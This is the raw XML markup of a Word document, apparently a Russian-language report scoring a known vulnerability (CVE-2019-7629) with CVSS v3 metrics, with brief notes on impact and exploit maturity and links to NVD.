          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25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5"/>
          <w:szCs w:val="25"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Integrity Impact (I)*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25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5"/>
          <w:szCs w:val="25"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Availability Impact (A)*</w:t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Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">None - потому что сам по себе эксплойт не приводит к нарушению целостности приватности и доступности. А вот пэйлоад - вполне может привести.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Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:color w:val="333333"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25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5"/>
          <w:szCs w:val="25"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Temporal vector metrics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Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Существует эксплойт, официально уже вышел фикс.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId21" w:type="first"/>
      <w:headerReference r:id="rId22" w:type="default"/>
      <w:footerReference r:id="rId23" w:type="first"/>
      <w:footerReference r:id="rId24" w:type="default"/>
      <w:pgSz w:h="15840" w:w="12240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440" w:lineRule="auto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171450</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="7786688" cy="1060518"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapSquare wrapText="bothSides" distB="0" distT="0" distL="0" distR="0"/>
          <wp:docPr descr="footer graphic" id="11" name="image15.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr descr="footer graphic" id="0" name="image1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6688" cy="1060518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440" w:lineRule="auto"/>
      <w:ind w:left="-15" w:firstLine="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180975</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="7786688" cy="1060518"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapSquare wrapText="bothSides" distB="0" distT="0" distL="0" distR="0"/>
          <wp:docPr descr="footer graphic" id="2" name="image15.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr descr="footer graphic" id="0" name="image1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6688" cy="1060518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800" w:lineRule="auto"/>
      <w:rPr>
        <w:color w:val="e01b84"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:color w:val="e01b84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e01b84"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">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5724525</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-66674</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="1143000" cy="1143000"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapSquare wrapText="bothSides" distB="0" distT="0" distL="0" distR="0"/>
          <wp:docPr descr="corner graphic" id="13" name="image13.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr descr="corner graphic" id="0" name="image1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4581525</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-66674</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="2281450" cy="2281450"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapSquare wrapText="bothSides" distB="0" distT="0" distL="0" distR="0"/>
          <wp:docPr descr="corner graphic" id="4" name="image14.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr descr="corner graphic" id="0" name="image1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n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720" w:hanging="36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nvd.nist.gov/vuln/detail/CVE-2019-7629" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6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17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://nvd.nist.gov/" TargetMode="External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0.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:N/A:N/E:P/RL:O/RC:C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5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